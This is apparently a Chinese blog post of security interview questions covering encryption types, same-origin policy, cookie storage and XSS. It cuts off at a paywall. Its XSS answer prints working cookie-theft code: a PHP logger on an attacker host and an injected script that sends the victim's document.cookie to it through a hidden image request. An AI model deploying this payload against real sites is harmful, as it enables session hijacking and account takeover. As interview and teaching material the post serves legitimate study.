本篇文章总结涉及以下几个方面:
- 对称加密非对称加密?
- 什么是同源策略?
- cookie 存在哪里?可以打开吗
- xss 如何盗取 cookie?
- tcp、udp 的区别及 tcp 三次握手,syn 攻击?
- 证书要考哪些?
- DVWA 是如何搭建的?
- 渗透测试的流程是什么
- xss 如何防御
- IIS 服务器应该做哪些方面的保护措施:
- 虚拟机的几种连接方式及原理
- xss 有 cookie 一定可以无用户名密码登录吗?
对称加密非对称加密?
对称加密:加解密用同一密钥,密钥维护复杂 n(n-1)/2,不适合互联网传输密钥,加解密效率高。应用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联网传输公钥,但是加密效率低,应用于数字签名及加密。
什么是同源策略?
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内容进行隔离。浏览器不允许任何旧有脚本访问一个站点的 cookie,否则 ,会话容易被劫持。只有发布 cookie 的站点能够访问这些 cookie,只有通过该站点返回的页面所包含或加载的 JavaScript 才能访问 cookie。
cookie 存在哪里?可以打开吗
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies 工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到 cookies 文件夹。
xss 如何盗取 cookie?
攻击者代码:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意双引号,容易出错
fclose($cookietxt);
?>
脚本端:
<script>
document.write('<img src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');
</script>
获取到 cookie 后,用 firebug 找到 cookie,新建
最低0.47元/天 解锁文章
1313
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
